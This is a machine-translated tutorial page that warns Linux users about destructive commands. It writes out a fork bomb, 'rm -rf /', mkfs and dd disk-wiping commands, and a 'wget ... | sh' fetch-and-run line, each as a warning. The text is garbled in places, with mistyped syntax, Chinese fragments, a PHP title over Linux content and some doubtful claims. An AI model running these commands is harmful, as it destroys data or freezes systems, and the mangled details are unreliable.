Home > Backend Development > PHP Tutorial > 9 PHP commands & codes that you must always be vigilant about

9 PHP commands & codes that you must always be vigilant about

伊谢尔伦
Release: 2016-11-24 14:31:48
Original
1188 people have browsed it

Linux shell/terminal commands are very powerful, even a simple command may cause folders, files or path folders to be deleted.

In some cases, Linux will not even ask you and directly execute the command, causing you to lose various data information.

Generally speaking, new Linux users are recommended to execute these commands on the Web. Of course, there are also people who have written this code who don’t think so, because this thing is no longer a joke once you write it down.

Here I have collected some Linux codes that are harmful to the system to help you avoid them. Remember: this code is very dangerous and can even be modified to become more harmful.

Something else to note: some commands are harmful only if they have the sudo prefix in Ubuntu. Other distributions of Linux will be harmful when used as root directory commands.

1. Linux Fork Bomb Command

:(){ :|: & };: Known as Fork Bomb, it is a denial of service attack on the Linux system. :(){ :|: & };: is a bash function. As long as it is executed, it will be repeated until the system is frozen.

You can only solve this problem by restarting the system. So be sure to pay attention when you execute this command on the Linux interface.

2. Mv Folder/Dev/Null Command

mv folder/dev/null is also a dangerous command. Dev/null or null device is a device file that deletes all data written on this device file. However, the operation prompt is that the write operation was executed successfully. This is what we often call bit bucked or black hole.

3. Rm -Rf Command

The rm -rf command can quickly delete folders and their contents in Linux systems. If you don't know how to use it correctly, you will just cry.

List the most common combinations and choices of m-rf commands:

rm command :删除Linux系统的文件
rm -f command:不需提示,删除文件中的只读文件
rm -r command 循环删除文件夹的内容
rm -d command :删除空目录,如果非空目录则不会执行该操作
rm -rf/ command:强制删除根目录中的所有内容和子文件夹(包括写保护文件)命令。
rm -rf* command :强制删除当前目录中的所有内容(当前工作目录)和字文件夹
rm -rf. command:强制删除当前文件夹目录/子目录中的所有内容 。同rm -r.[^.]*
The rm -r.[^.]* command :删除文件及文件夹,带有删除提示
Copy after login

4. Mkfs Command

If you don’t know the function of mkfs, then it is also a dangerous command. Any command written after mkfs will be replaced by a Format and replace blank linux file systems.

The following are the commands that require administrator permissions to format the hard disk:

mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos mkfs.reiserfs
mkfs.vfat
Copy after login

mkfs.cramfs can also do the same thing as the above code, but does not require administrative source permissions.

5. Tar Bomb

The tar command is used to put multiple files into one file (archive file) in .tar format. Tape Archive (Tar) bomb can be created by him.

When compressed, it is this archive file that generates tens of thousands of similarly named files that appear in the current directory instead of a new directory.

When receiving tar files, regularly create a new protected directory and then place the received tar file into this directory before unzipping, you can avoid becoming a victim of tar bomb.

6. Dd Command

Dd command is used to copy & change hard disk partitions. If you use it in the wrong place, it can be dangerous.

The dd command is listed below:

dd if=/dev/hda of=/dev/hdb
dd if=/dev/hda of=/dev/sdb
dd if=something of=/dev/hda
dd if=something of=/dev/sda
Copy after login

The following command will clear the entire main hard disk: dd if=/dev/zero of=/dev/had

7. Shell Script Code

Sometimes, you may be The trap gives you a shell script file and asks you to download and execute it. The script may contain some malicious or dangerous code. The command form may be like this: wget http://some_malicious_source -O- | sh. wget will download the script when sh narrow script.

8. Malicious Source Code

Maybe someone will give you the source code and let you compile it. The code may be normal code, but there may be some malicious code disguised in the large source code. If so, your system is vulnerable. How to avoid it? Only accept and compile source code from trustworthy sources.

9. Decompression Bomb

You have received a compressed file and you have been asked to extract this seemingly small file, maybe as small as KB. In fact, the small size of the compressed file contains highly compressed data.

As long as the file is decompressed, hundreds of GB of data will be extracted. At this time, there is a high chance that the excessively large data will fill the hard drive and cause downtime. How to avoid it? As the old saying goes, don’t be cheap, accept any documents, please accept documents from trusted sources.


Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template